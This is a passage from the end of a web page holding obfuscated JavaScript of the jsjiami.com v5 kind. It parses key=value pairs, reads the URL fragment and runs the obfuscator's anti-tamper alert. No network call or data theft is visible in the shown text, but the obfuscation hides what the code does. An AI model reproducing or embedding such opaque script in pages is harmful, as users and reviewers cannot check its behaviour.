_0x1cf41a=_0x521520[_0x25082a][_0x5169('0x4b','ym%U')]('=');if(_0x7ff84e['PjnTX'](_0x1cf41a[0x0],_0x10c4b7)){return _0x1cf41a[0x1];}}}}continue;case'3':var _0x5844d9=window[_0x5169('0x4c','Iq0z')][_0x5169('0x4d','(gm[')][_0x5169('0x4e','ljH!')](0x1);continue;case'4':return![];}break;}};(function(_0x54fa82,_0x59056a,_0x2668ff){var _0x5dc81c={'fWQIA':_0x5169('0x4f','LYE6'),'SbTHI':_0x5169('0x50','$%&b'),'kYFZh':_0x5169('0x51','@AP8'),'nlUZd':_0x5169('0x52','(QUh'),'mltwM':'xAd','ZmBfM':_0x5169('0x53','DBJh'),'nCtVX':function _0x5a3af6(_0x44e470,_0x538203){return _0x44e470===_0x538203;}};_0x2668ff='al';try{_0x2668ff+=_0x5dc81c['fWQIA'];_0x59056a=encode_version;if(!(typeof _0x59056a!==_0x5dc81c[_0x5169('0x54','%E*p')]&&_0x59056a===_0x5dc81c[_0x5169('0x55','^U1$')])){if(_0x5dc81c[_0x5169('0x56','(gm[')]!==_0x5dc81c[_0x5169('0x57','^U1$')]){_0x54fa82[_0x2668ff]('删除'+_0x5dc81c[_0x5169('0x58','40AT')]);}else{_0x2668ff='al';try{_0x2668ff+=_0x5dc81c[_0x5169('0x59','kmJp')];_0x59056a=encode_version;if(!(typeof _0x59056a!==_0x5dc81c[_0x5169('0x5a','ozT8')]&&_0x5dc81c['nCtVX'](_0x59056a,_0x5dc81c[_0x5169('0x5b','K6mL')]))){_0x54fa82[_0x2668ff]('删除'+_0x5dc81c['ZmBfM']);}}catch(_0x303e2e){_0x54fa82[_0x2668ff](_0x5169('0x5c','ozT8'));}}}}catch(_0xc3c923){_0x54fa82[_0x2668ff](_0x5169('0x5d','34ON'));}}(window));;encode_version = 'jsjiami.com.v5';
</script>
</html>